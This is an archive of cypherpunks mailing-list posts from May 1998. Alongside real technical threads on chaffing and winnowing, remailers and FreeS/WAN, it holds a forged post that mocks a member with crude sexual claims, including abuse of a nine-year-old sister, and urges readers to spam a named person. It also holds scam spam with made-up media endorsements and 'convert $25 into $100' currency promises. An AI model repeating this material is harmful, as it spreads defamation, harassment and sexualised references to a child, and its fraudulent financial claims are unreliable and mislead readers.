                   MASTERCARD   VISA   AMEX

   PLEASE CALL 213-980-7850 to process your order
                        9am-5pm Pacific Time
                Checks or Money Orders send to:
                      WorldTouch Network Inc.
5670 Wilshire Blvd.  Suite 2170 Los Angeles, CA 90036
Please note:  Allow 5 business days for all checks to
clear before order is shipped.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 May 1998 09:12:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Public Key Royalties
Message-ID: <199805141609.MAA22580@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


In a recent GAO report on governmental funding of university research
there is this note:

   In fiscal year 1996, the commercialization of the public key encryption 
   method, which was developed under grants from the Navy and NSF, 
   resulted in $271,875 in royalties to MIT.

Does this refer to RSA or PGP? Did the Navy underwrite RSA's PK work?
If so does the USG have a secret stake in PGP, Network Associates
and RSA?

More: did the Navy guide PK researchers based on the secret UK PK work 
before Diffie-Hellman?

The full report:

   http://jya.com/rced-98-126.txt  (184K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Thu, 14 May 1998 11:50:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: A 'Nobody' Out From 'Obscura'
In-Reply-To: <41a646f.355b28e4@aol.com>
Message-ID: <355B3D07.605D@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


StanSqncrs wrote:
> In a message dated 5/14/98 11:07:23 AM Central Daylight Time, tcmay@got.net
> writes:

>>  Stan ("and the Sequencers") quotes me as saying things I never said. >>

> Look, nobody (IMHO), I quoted another FreeGroupie.  Then I quoted YOU involved
> in a 'red-herring' (unless someone forged your address) - "This qualifies as
> an Official News Story Quote under the guidelines released by 'True Lies On
> The InterNet Coommiittee' which was formed on Oct. 3, 1954."
> 
> Keep it up, Tim.

Boy, do I feel like an idiot!!!

I got my head out of my ass and checked out the headers on some
of the messages coming from the list and discovered that many
of them, including the one I am referring to above, are forgeries
by Ulf Moller (who has those two 'eyes' over the 'o' in his name,
just like the eye in the pyramid on the US dollar-bill, which 
means he must be a Bavarian Illuminati shill).

Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id UAA02347 for 
cypherpunks@algebra.com; Wed, 13 May 1998 20:33:59 -0500
Received: from public.uni-hamburg.de (public.uni-hamburg.de [134.100.41.1]) by 
einstein.ssz.com (8.6.12/8.6.9) with ESMTP id UAA02311 for 
<cypherpunks@einstein.ssz.com>; Wed, 13 May 1998 20:33:32 -0500
Received: from paris.public.uni-hamburg.de (max2-145.public.uni-hamburg.de 
[134.100.45.145])
Received: by ulf.mali.sub.org (Smail3.1.28.1 #1)
Message-Id: <m0yZmcP-0003bcC@ulf.mali.sub.org>
Date: Thu, 14 May 98 03:15 +0200
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
To: cypherpunks@einstein.ssz.com, mix-l@jpunix.com
Subject: Re: "... would cause us to look at this person as a threat"


I would like to apologize to Tim, and to all of the other
cypherpunks that I have offended by my stupid, ignorant posts
and attitude on the list.
I'm not really a CypherPunk. I don't even suck cock!
(OK, I sucked my brother's cock a little, when I was younger,
 but that was just 'experimentation', OK? By the time I was
 nine, I had started fucking my little sister, so that *proves*
 I'm straight, eh?)

Anyway, I don't think we should put up with this shit from Ulf
(DoubleEye Illuminati) Moller. Let's all spam him.

Stan Guildenstern
http://A(h)OL(e).commie/Boy_Am_I_Stupid!!!.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Tillotson <markt@harlequin.co.uk>
Date: Thu, 14 May 1998 05:08:33 -0700 (PDT)
To: gibreel@pobox.com
Subject: Re: Chaffing and winnowing
In-Reply-To: <874syut9ld.fsf@wsuse5.mckesson.com>
Message-ID: <199805141207.NAA00226@spike.long.harlequin.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Zander <gibreel@pobox.com> wrote:
| 
| But wasn't that the gist of Rivest's paper: he's not encrypting the
| message, he's just obscuring it really, really well.

His point is that the message packets start out readable, and then by
adding other packets (not altering the originals) you gain security,
whether intentional or not - apparently encryption is performed by
accident and without a key.

So he argues that since this technique transforms a cleartext stream
to a secure one without use of any cryptographic technique or
algorithm, no act of encryption has happened.

However it is not that simple - for a start to gain real security you have
to be careful to mingle streams in very precise ways, to lose the
temporal statistics that give away the origins of each packet - you
have to match wheat to chaff on a packet by packet basis to get good
security.  Furthermore you have to use a CSRNG or true random source
to generate fake MACs, or have another MAC key for the complementary
stream(s) - It is not so easy to say that these precautions could be an
accidental act, or that they are entirely non-cryptographic.

However I view the process rather differently.  There are two channels
- the message is carried in the MAC and in the plaintext bits.
Chaffing simply serves to obliterate the plaintext channel.  The
recipient doesn't need to get the plaintext bits at all - they can
simply try the MAC against both 0 and 1, and choose the correct one.
(although this doubles the workload)

Furthermore an "attacker" can't tell, without breaking the MAC scheme,
whether the plaintext is genuine or a blind, and so this makes
chaffing/winnowing an ideal carrier of steganography.  It's like
sending a plaintext file and a ciphertext file together, with an
assertion that they correspond - unless you can prove this assertion
how can an outsider be convinced you are not hiding information in the
ciphertext file?  How can you prove this assertion without giving away
your MAC key?  How can you demonstrate you are using a MAC and not
simply triple-DES?


__Mark
[ markt@harlequin.co.uk | http://www.harlequin.co.uk/ | +44(0)1954 785433 ]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Thu, 14 May 1998 10:26:19 -0700 (PDT)
To: tcmay@got.net
Subject: Re: A 'Nobody' Out From 'Obscura'
Message-ID: <41a646f.355b28e4@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/14/98 11:07:23 AM Central Daylight Time, tcmay@got.net
writes:

<< At 1:12 AM -0700 5/14/98, StanSqncrs wrote:
 >In a message dated 5/14/98 1:28:03 AM Central Daylight Time, tcmay@got.net
 >writes:
 >
 ><< > Bad beginning, Sir Will.  The willingness to pass along material of
 >dubious
 > > authenticity is not a good sign in my book. As Mr. Natural would say,
 >"Check
 > > your source."  So, what *IS* your source?
 >
 > This qualifies as an Official News Story Quote under the guidelines
 > released by 'True Lies On The InterNet Coommiittee' which was formed
 > on Oct. 3, 1954. >>
 
 Stan ("and the Sequencers") quotes me as saying things I never said. >>

Look, nobody (IMHO), I quoted another FreeGroupie.  Then I quoted YOU involved
in a 'red-herring' (unless someone forged your address) - "This qualifies as
an Official News Story Quote under the guidelines released by 'True Lies On
The InterNet Coommiittee' which was formed on Oct. 3, 1954."

Keep it up, Tim.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 14 May 1998 04:33:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Anymous twit dealing in hypocracy
In-Reply-To: <199805101850.LAA00114@sirius.infonex.com>
Message-ID: <199805141133.NAA13097@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


wmcclatc@primenet.com (William J. McClatchie) wrote:

> X-Comment: Aw, are you offended?

[...]

> > Do you operate a remailer, McClatchie?
>  
> Do you? Which one?
>
> Personally, too many people use them for abusive purposes these days to
> feel like making the effort.  Just look in triangle.general for posts from
> nobody@replay.com for an example of someone using a remailer to harrass
> someone else.

Perhaps you ought to reread your own header line, if you don't like what is
being posted:  "Aw, are you offended>".  Many remailer users utilize them
to avoid retaliation for hypersensitive netcops like you, Gary Burnore, and
Steve Crisp.

If everyone posted strictly politically correct content that wouldn't offend
anyone, there would be little need for anonymity.  But threatening to
"beat the living fuck out of" someone because he disagreed with what someone
posted is ample reason to withhold one's name and e-mail address.

If you don't like to read anonymous posts, please feel free to learn the
proper use of a killfile, McClatchie.  BTW, only one of us is using a
proper, RFC-compliant e-mail address in the From: line.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jackson Dodd <jackson@usenix.ORG>
Date: Thu, 14 May 1998 14:11:03 -0700 (PDT)
To: coderpunks@toad.com
Subject: Announcing the Call for Papers - USENIX 1999 Annual Conference
Message-ID: <199805142113.OAA00295@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain



The Program Chair, Avi Rubin of AT&T Labs - Research, and the Program
Committee announce the availability of the Call for Papers for:

1999 USENIX ANNUAL TECHNICAL CONFERENCE
June 7-11, 1999
Monterey Conference Center, Monterey, California

Sponsored by USENIX, the Advanced Computing Systems Association

================================================
Call for Papers at
    http://www.usenix.org/events/usenix99/cfp.html

Paper submissions due:  December 2, 1998
================================================

The Program Committee seeks original and innovative papers on the
applications, architecture, implementation, and performance of modern
computing systems. Papers that analyze problem areas and draw important
conclusions from practical experience are especially welcome. Some
particularly interesting application topics are:

               Availability
               Distributed caching and replication
               Embedded systems
               Extensible operating systems
               File systems and storage systems
               Interoperability of heterogeneous systems
               Mobile code
               Mobile computing
               Multimedia
               New algorithms and applications
               Personal digital assistants
               Quality of service
               Reliability
               Security and privacy
               Ubiquitous computing and messaging
               Web technologies

Invited Talk and tutorial suggestions and proposals are also very 
welcome.
====================================================================
USENIX is the Advanced Computing Systems Association.  Its members 
are the computer technologists responsible for many of the innovations 
in computing we enjoy today.  To find out more about USENIX, visit its 
web site: http://www.usenix.org.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@road.toad.com>
Date: Thu, 14 May 1998 14:57:25 -0700 (PDT)
To: linux-ipsec@clinet.fi
Subject: ANNOUNCE:  FreeS/WAN IPSEC & IKE version 0.8 released & useful!
Message-ID: <199805142156.OAA24052@road.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  I would like to announce for the FreeS/WAN software team that they
now have a freeswan-0.8 release available for download from the
FreeS/WAN home page at:
	  http://www.xs4all.nl/~freeswan

  The 0.8 (and target 1.0 in June) runs only in a VPN (tunnel) mode,
protecting and encrypting net traffic for a subnet behind the SG.
This setup is called a SG for Security Gateway.  We plan on
implementing the rest of the IPSEC and IKE draft standards in our 2.0
release later this summer for the 2.1.xxx and 2.2.xx series Linux
kernels.

  There is some useful documentation for the current FreeS/WAN done by
Kai Martius at:
    http://www.imib.med.tu-dresden.de/imib/Internet/index.html

  The 0.8 release has been tested extensively in the hand keyed
ESP-3DES-HMAC-MD5-96 tunnel mode and is quite robust.  On a 150Mhz 586
Clone PC TCP throughput is over 320 Kbytes/second sustained as
measured by netperf.
  The IKE daemon pluto has been tested only a very little and
sometimes works and sometimes does not.  It will work for the simple
VPN case before 1.0.

  Feedback, new features, documentation, scripts and bug fixes &
reports are especially useful in the next few weeks before we start in
on the 0.9x series of release working up to a stable 1.0 release in
June.  Don't wait for the last minute to submit that neat feature or
bug fix, as we might not have time to include it!

  If you have questions about the project please see our home page
where you will find a mail list, list archives, FTP directory's etc.
  Thanks to everyone who made this release possible, but mostly the
people who coded it up!

  Please post all bugs, fixes, code etc. to the public email list at
<linux-ipsec@clinet.fi>.

		||ugh Daniel
		hugh@toad.com
			Systems Testing & Project mis-Management
			The Linux FreeS/WAN Project
			http://www.xs4all.nl/~freeswan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Thu, 14 May 1998 12:33:24 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Re: A 'Nobody' Out From 'Obscura'
Message-ID: <c2a21da4.355b46ce@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Obviously, this is a forgery, it isn't me, my guess is, it's our 'nobody' -

<< Boy, do I feel like an idiot!!!
 
 I got my head out of my ass and checked out the headers on some
 of the messages coming from the list and discovered that many
 of them, including the one I am referring to above, are forgeries
 by Ulf Moller (who has those two 'eyes' over the 'o' in his name,
 just like the eye in the pyramid on the US dollar-bill, which 
 means he must be a Bavarian Illuminati shill).
 
 Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id
UAA02347 for 
 cypherpunks@algebra.com; Wed, 13 May 1998 20:33:59 -0500
 Received: from public.uni-hamburg.de (public.uni-hamburg.de [134.100.41.1])
by 
 einstein.ssz.com (8.6.12/8.6.9) with ESMTP id UAA02311 for 
 <cypherpunks@einstein.ssz.com>; Wed, 13 May 1998 20:33:32 -0500
 Received: from paris.public.uni-hamburg.de (max2-145.public.uni-hamburg.de 
 [134.100.45.145])
 Received: by ulf.mali.sub.org (Smail3.1.28.1 #1)
 Message-Id: <m0yZmcP-0003bcC@ulf.mali.sub.org>
 Date: Thu, 14 May 98 03:15 +0200
 From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
 To: cypherpunks@einstein.ssz.com, mix-l@jpunix.com
 Subject: Re: "... would cause us to look at this person as a threat"
 
 
 I would like to apologize to Tim, and to all of the other
 cypherpunks that I have offended by my stupid, ignorant posts
 and attitude on the list.
 I'm not really a CypherPunk. I don't even suck cock!
 (OK, I sucked my brother's cock a little, when I was younger,
  but that was just 'experimentation', OK? By the time I was
  nine, I had started fucking my little sister, so that *proves*
  I'm straight, eh?)
 
 Anyway, I don't think we should put up with this shit from Ulf
 (DoubleEye Illuminati) Moller. Let's all spam him.
 
 Stan Guildenstern
 http://A(h)OL(e).commie/Boy_Am_I_Stupid!!!.html >>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goodnews4u@mailexcite.com
Date: Thu, 14 May 1998 19:04:27 -0700 (PDT)
Subject: El Nino !!!
Message-ID: <199805150204.TAA14141@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



                                            El Nino

Learn how to be an informed investor and how a $1.00 realized 
gain in your
grain option value could return as much as $25,000 on a minimum 
investment
of $5,000.

Why Invest Now?


The 1982-1983 El Nino was the strongest of the century spreading 
drought,
floods and extreme weather across the vast stretches of the 
globe.  Total
combined losses to property and agriculture from weather related
catastrophes are estimated to have exceeded $10 billion.  The 
current El
Nino  has already surpassed the 1982-1983 event in magnitude and 
is expected
to have major impacts on world weather through the summer of 
1998.


How realistic is it that the grain option prices will move one 
dollar?


1982-1983 El NINO IMPACT ON AGRICULTURAL PRODUCTS FUTURES PRICES

corn:        Nov. 1982-$2.165/bushel (low)      Aug. 1983-  
3.76/bushel
(high)     $1.59 increase

soybeans:    Oct. 1982 $5.18/ bushel  (low)     Sep. 1983-  
$9.60/ bushel
(high)    $4.42 increase


That's the past.  What does the future hold?


It remains to be seen if the 1997-1998 El Nino will duplicate the 
severe
weather conditions that affected agriculture production around 
the globe in
1982-1983.  However, given the historically tight supplies and 
record demand
for corn and sobeans repectively, combined with the strength of 
the current
El Nino event along with grain prices starting out from 
multi-year lows,  it
is our opinion that there is the potential for dramatic price 
increases in
the futures and options prices of agricultural products.


How do I receive my free information on the corn and soybean 
markets?
Call Us at 1-800-526-4922, 24 Hrs. a day, seven days a week ,
Please include: (no packages can be
sent without the following)

*NAME

*ADDRESS

*PHONE#

*BEST TIME TO CALL



An American Research & Trading, Inc., Series 3 registered 
commodity broker
will call to confirm the request for information.  All American 
Research &
Trading, Inc. brokers are registered with the National Futures 
Association
(NFA) and the Commodity Futures Trading Commission (CFTC).

Please only serious inquiries.

Past performance is not necessarily indicative of future results. 
 You could
lose part or all of your investment.  However, when purchasing 
options, your
risk is predetermined to the amount you invest.  Commission and 
fees will
impact the total amount Returned to the client. Options do not 
move dollar
for dollar with the underlying futures contract until expiration 
date. No
implication is being made that any American Research & Trading, 
Inc. client
has or will obtain such a profit.

To remove your name from our mailing list, please send an e-mail 
to:
jcooley245@aol.com

put the word "remove" along with your e-mail address.  We will 
immediately
remove your name.











ns
BD
p-g-d
58-n+t
9-1
c#d
d
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 14 May 1998 15:03:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SecureOffice Challenge
Message-ID: <199805142203.SAA11962@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Kathleen Ellis has announced on Cryptography that
she has put a copy of SecureOffice on her Web site
in support of Charles Boother and against the BXA 
subponea of his records concerning export of his
168-bit encryption program:

    http://www.filesafety.com/

We are pleased to join Kathleen by putting SecureOffice
on our site, with the thread on civil disobedience at:

   http://jya.com/bxa-syncsys.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 14 May 1998 20:52:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: test
Message-ID: <199805150331.UAA29933@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


don't answer this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcoile@home.atlantech.net
Date: Thu, 14 May 1998 17:44:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ignore
Message-ID: <199805150044.UAA27560@home.atlantech.net>
MIME-Version: 1.0
Content-Type: text/plain


only a test..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 14 May 1998 21:57:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Non-anonymous remailers
In-Reply-To: <199805150215.EAA08803@basement.replay.com>
Message-ID: <3.0.5.32.19980514215643.007dfcc0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:15 AM 5/15/98 +0200, some allegedly anonymous person wrote:
>Recently a new technology has been proposed: non-anonymous remailers.

Feh - anybody who wants non-anonymous remailers should include his name :-)
On the other hand, perhaps the allegedly anonymous author didn't
believe the purported name of the alleged proposer, or chose to
phrase the proposal in the exculpatory passive voice.

>A non-anonymous remailer separates the two traditional functions of the
>remailer network: anonymity and avoiding traffic analysis.  Because the
>network provides both of these features, some people may not be aware
>that they are distinct.

Good point.  

>A non-anonymous remailer avoids traffic analysis but does not provide
>anonymity.  The recipient can tell who the sender of a message is,
>but no one else can, neither the remailers nor eavesdroppers.
>
>There are several ways to achieve this cryptographically.  The general
>idea is that the sender of the message must sign it with a valid public
>key (one signed by a CA trusted by the remailer network).  This signature
>is hidden from everyone but the recipient because the message is encrypted
>for the recipient.  However the sender can use variants of zero knowledge
>proofs to demonstrate that inside the encryption there is a signature
>which satisfies the requirements.

Overkill, and inadequate.  Let's start with overkill:
- If you require all outgoing email to be encrypted,
  you don't have constructive knowledge that your system
  is being abused.  Legally, that should be significant protection;
  rules about not being liable for things you don't know you did
  are much harder to change than rules about things you know.
- Posting a big sign requiring conformance with policies,
  backed up by occasional action against violators,
  helps establish your presumption of good character.
- Requiring all outgoing mail to be encrypted makes spamming
  much more difficult (today), though in the Great Cryptographic Future,
  when everybody has at least one easily-located public key,
  that's less effective - but even then it significantly increases
  the workload for the spammer (though Moore's Law makes that less
  relevant, and good Crypto APIs make development of spamware easy.)
  It doesn't stop harassers, but it does reduce spam.
- A few Supreme Court cases, such as Talley and McIntyre,
  protect the right to anonymous speech, including commercial,
  so the proposed law has a high bogosity index.

For inadequacy, there are a variety of problems:
- Zero-knowledge proofs can at most verify that there's an identifier
  in some defined format or from some accessible list of keys.
  They can't verify that the message really came from
  the homeless person who allegedly sent the mail, nor that the
  address, phone number, or email named can locate a real body.
  They also tend to need special forms for the data, which may not
  work for CA-format key signatures.
- ZKPs aren't very useful for identifying the insides of 
  multiply-encrypted data - so they only give you one hop at a time,
  and only for cooperative remailers in cooperative jurisdictions.
- Protocols that provide information about the insides of
  an encrypted message are notoriously hard to make both
  secure and useful.

>Non-anonymous remailers would be suitable for cases where people do
>not want eavesdroppers to know with whom they are communicating, but
>where they don't need to be anonymous to their communication partners.

Distinctly true, though the easiest way to achieve that is to
separate the two problems, providing solid privacy protection
outside and letting the users sign the inside message if they want.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SeeInfoBelow@yahoo.com
Date: Thu, 14 May 1998 22:25:19 -0700 (PDT)
To: WiseFolk@yahoo.com
Subject: 2 x 2 = $1,100                                                    (S1)
Message-ID: <199805150523.XAA15935@sparky.i-link.net>
MIME-Version: 1.0
Content-Type: text/plain



===============================================================
           The New ABC Math: 2 x 2 = $1,100 Per Cycle!
===============================================================

  Fast-Cycling 2 X 2 Company Matrix Means Great Commissions!

  How many $1,100 checks would you like to receive... DAILY?

        For the Serious Entrepreneur or Business Person:
                  Tools to Help Your Business
                    By a 9-year old Company

               * Business Opportunity Seeker Leads
               * 7.9 cents/min Long Distance
               * Virtual Office

               2 Minute Overview:  (415) 273-6063

                  Ask yourself these questions:
         Are you willing to invest in your own success?
        How many times would you like to cycle in a day?

                        IT'S THAT SIMPLE!

            http://www.fontaineonline.com/cyberedge

===============================================================
 To be REMOVED from our list, type REMOVE is the subject area
         of a new email and send to: B2998@yahoo.com
===============================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gburnore@netcom.com (Gary L. Burnore)
Date: Thu, 14 May 1998 16:22:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Abusive crossposting by anonymous remailer user (Was: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC)
In-Reply-To: <199805101850.LAA00114@sirius.infonex.com>
Message-ID: <355c7cd1.523967461@206.214.99.10>
MIME-Version: 1.0
Content-Type: text/plain


On 14 May 1998 12:03:51 GMT, in article <6jemj7$6km@news1.cheetah.net>,
mefisto@ns1.cheetah.net () wrote:

:9AD67.6649@pageplanet.com> <199805131942.VAA17993@basement.replay.com>
:Distribution: 
:
:Anonymous (nobody@REPLAY.COM) wrote:
:: Steve Crisp <crisp@pageplanet.com wrote:
:
:: > And it still stands. Come out of hiding and see if you survive the
:: > night.
:: >  
:: > Steve Crisp
:
:: Does anyone question the need for the ability to post anonymously with
:[--]
::    PagePlanet (PAGEPLANET-DOM)
:
:What's the big deal.  Anyone doing a whois can find this and any other
:address.  They ARE published openly and UN-ANONYMOUSLY.	 You think you
:invented something?

My guess is that PagePlanet is his next target.  He did the same thing to
DataBasix (and me).

-- 
        for i in databasix netcom primenet ; do ; gburnore@$i ; done
---------------------------------------------------------------------------
                  How you look depends on where you go.
---------------------------------------------------------------------------
Gary L. Burnore                       |  ۳ݳ޳ݳۺݳ޳ݳݳ޳ݳ۳
                                      |  ۳ݳ޳ݳۺݳ޳ݳݳ޳ݳ۳
DOH!                                  |  ۳ݳ޳ݳۺݳ޳ݳݳ޳ݳ۳
                                      |  ۳ 3 4 1 4 2  ݳ޳ 6 9 0 6 9 ۳
spamgard(tm):  zamboni                |     Official Proof of Purchase
===========================================================================
             PGPprint: C63B CF4E 1B71 4D7E C6F8 AF4E 338D 5CB4
    KeyID: 0x0F7EDBD9 (RSA)     finger gburnore@netcom.com for public key
---------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Thu, 14 May 1998 19:15:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Non-anonymous remailers
Message-ID: <199805150215.EAA08803@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently a new technology has been proposed: non-anonymous remailers.

A non-anonymous remailer separates the two traditional functions of the
remailer network: anonymity and avoiding traffic analysis.  Because the
network provides both of these features, some people may not be aware
that they are distinct.

Anonymity means that no one can tell who sent a message.  Neither the
recipient, the remailers, or an eavesdropper can know the source of
a message.

Avoiding traffic analysis means making it impossible for the path a
message takes through the network to be traced, either by the remailers
or by third parties.

A non-anonymous remailer avoids traffic analysis but does not provide
anonymity.  The recipient can tell who the sender of a message is,
but no one else can, neither the remailers nor eavesdroppers.

There are several ways to achieve this cryptographically.  The general
idea is that the sender of the message must sign it with a valid public
key (one signed by a CA trusted by the remailer network).  This signature
is hidden from everyone but the recipient because the message is encrypted
for the recipient.  However the sender can use variants of zero knowledge
proofs to demonstrate that inside the encryption there is a signature
which satisfies the requirements.

The remailer net will only deliver a message to an end user if it is able
to verify that the message, when decrypted, will be properly signed.
This assures that the end user will be able to determine who sent the
message, while no one else will.

Non-anonymous remailers would be suitable for cases where people do
not want eavesdroppers to know with whom they are communicating, but
where they don't need to be anonymous to their communication partners.
A financial house's merger and acquisitions department, for example,
would not want third parties to know with whom they are exchanging
email.  A surveillance target will want to hide the identities of his
co-conspirators.  An employee who is considering changing jobs will
not want his employer to know that he is sending email to a competitor.
Many similar examples exist.

Non-anonymous remailers would also have the advantage that they would be
much less prone to abuse than anonymous remailers.  Sending a harrassing
message or commercial spam through a non-anonymous remailer would be
pointless.  It might as well have been sent directly, since the remailer
does not hide the sender's identity from the recipient.

In summary, non-anonymous remailers prevent traffic analysis without
providing anonymity.  This more limited functionality renders the remailer
less vulnerable to abuse and misuse, while providing protection which
will be adequate for many situations, and which may be especially
appropriate for the business environment.

25BA1A9F5B9010DD8C752EDE887E9AF3 [Cantsin Protocol No. 2]
092AA1EC9926D468F8964B8EF537DDC1782A1281
5838A82465D8E6D05769B3A837D8C43CBF2C5500
-AE8 AE8
523DDCB64EAE3A8826583353B8A8B57D23952CEDE5605AF95605A60D8735040FD63CD0CAA1E3A35B946A8828565A9BD77AF301BFA40AC04C762F3A0ADFE6CE3B516D02A3E705167D43B04E1EBAB96F1875129BDF4E13B8F2023B72C3AE56A4102C24CF55213E3DF801A1451C92D94D3CC52D195EADBA8CF4BB7A976A7A1A3126EB8B7CA243DEC78665D7BA797BCA95EA5C8EA41B620C7F1BCE9662869B65F7E710A89CADD9DDF8CBE9265F057131067CA630F138D5AA5E4DAA19B1ECC6193A2A191CF7C5DD89B71590297189A60609A824A7A494A4944B37048DD2F8F0E510DA767E54C02F3E21DE6FFFB29D7B53607DD3920283B1ACC82FE1CAA0C5DD872EF6
2CD5E0D37250DE32D9A1A7229DB8D9DC5F3CA35BFD7E3F7F09612F4444ABE4FAB47097F9BF4D82DDD2FD5FF7770B1F80369EEBC9703265DE03B24ABEA9E584839569156638A5D21005CF06550392B45076B3026E25104F91B59FB994E89B4F15A168790CAC3ADD030EBC06E5C96086FBF7B17369E4D102725FA779784BACD67812B39E71003FE4741B57ECF814A1053F290F46FD07F48E5DA586FECCA62D3ABC54C15D8652F1FFDCE8D7C312486BC643F9AFE70518084644293643DF638172545B08D93CF6E2664211330A4555E8774B665C9CA344ABB698B6C709E767F9ECB8F78DB4B12F2271D15DC8D5A9E355A9C0F6CC413906E188A52B1AEB6009BAC5EA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sendoff6@hotmail.com
Date: Thu, 14 May 1998 20:21:51 -0700 (PDT)
To: sendoff6@hotmail.com
Subject: Find out what "They" don't want you to know!
Message-ID: <031297055501222@g_fantism.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend:
 
 If you have already responded to the following announcement a few 
 days ago, that means your package is already on its way and it 
 should be arriving soon! If you have not responded to this before, 
 please pay attention to it now. This is very important!!!
 
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
 IMPORTANT ANNOUNCEMENT
 IMPORTANT ACCOUNCEMENT
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 '''''''''''''''''''''''''''
 Your future May Depend on it !
 
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
 Before you know about this 'Important Announcement', you must 
 first read the following 'Editorial Excerpts' from some important 
 publications in the United States:
 
 NEW YORK TIMES: "In concluding our review of Financial 
 organizations to effect change in the 90's, special attention 
 should be called to a California based organization, 'WORLD 
 CURRENCY CARTEL'. Members of this organization are amassing 
 hundred of millions of dollars in the currency market using a very 
 LEGAL method which has NEVER been divulged to the general public. 
 While their purpose is not yet known, their presence has most 
 certainly been felt".
 
 NBC NIGHTLY NEWS: "Members of 'World Currency Cartel', who always 
 keep a low profile, are considered to be some of the most 
 wealthiest people in North America".
 
 More excerpts later, but first let us give you this very 
 'IMPORTANT ANNOUNCEMENT":
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
 '''''''''
 We are glad to announce that for the first time and for a very 
 short period of time, WORLD CURRENCY CARTEL will instruct a 
 LIMITED number of people worldwide on 'HOW TO CONVERT $25 INTO ONE 
 HUNDRED OF LEGAL CURRENCY'. We will transact the first conversion 
 for you, after that you can easily and quickly do this on your own 
 hundreds or even thousands of times every month.
 TAKE ADVANTAGE OF THIS "SECRET FLAW" !
 ******************************************************************
 ******************************************************************
 ***
 
 It is even more explosive than we have yet disclosed. While 
 currency does fluctuate daily, we can show you 'HOW TO CONVERT $99 
